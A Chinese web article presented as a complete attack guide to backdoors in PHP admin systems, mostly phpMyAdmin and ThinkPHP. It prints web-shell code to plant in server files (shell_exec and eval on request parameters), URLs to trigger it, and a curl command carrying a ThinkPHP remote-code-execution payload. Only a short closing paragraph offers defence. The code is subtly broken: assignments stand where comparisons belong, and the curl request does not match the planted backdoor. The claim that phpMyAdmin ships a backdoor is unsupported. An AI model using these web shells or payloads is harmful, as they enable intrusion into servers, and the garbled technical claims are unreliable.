一些 PHP 管理系统程序中的后门可以被黑客利用,获得对系统的非授权访问权。以下是攻击这些后门的完整攻略:
什么是后门?
后门,指在程序中预留的用于绕过正常认证机制的方法或接口。黑客利用后门可以绕过程序正常的安全机制,获得对系统的非授权访问权。
常见的 PHP 管理系统程序后门
常见的 PHP 管理系统程序后门包括:
- PHPMyAdmin 后门
- ThinkPHP 后门
- WordPress 后门
- Discuz 后门
PHPMyAdmin 后门攻击实例
在 PHPMyAdmin 中,存在一个名为“server_databases.php”的脚本,该脚本存在后门。攻击者可以将以下代码添加到该脚本中,以获得非授权访问权:
/* 务必替换以下密码为你自己的密码 */
if ($_GET['do']="exec" && $_GET['password']="pma123") {
echo shell_exec($_GET['cmd']);
exit;
}
攻击者可以在 URL 中加入以下代码,以获得对服务器的非授权访问权:
http://example.com/phpmyadmin/server_databases.php?do=exec&cmd=whoami&password=pma123
ThinkPHP 后门攻击实例
在 ThinkPHP 框架的 v5.0.22 或更早版本中,存在一个名为“route.php”的文件,该文件存在后门。攻击者可以将以下代码添加到该文件中,以获得非授权访问权:
/* 务必替换以下密码为你自己的密码 */
if ($_GET['pwd'] == 'admin') {
eval($_POST['a']);
exit;
}
攻击者可以发送以下命令,以获得对服务器的非授权访问权:
curl -X POST 'http://example.com/thinkphp5/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami' -d "a=<?php phpinfo(); ?>"
总结
攻击者利用 PHP 管理系统程序中的后门可以获得对系统的非授权访问权。为了防止攻击者利用系统中的后门,管理员应保证系统的安全性,及时更新程序版本,并遵循最佳安全实践,例如限制对敏感目录和文件的访问、关闭不必要的服务和端口、使用强密码和加密算法等。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:一些 PHP 管理系统程序中的后门 - Python技术站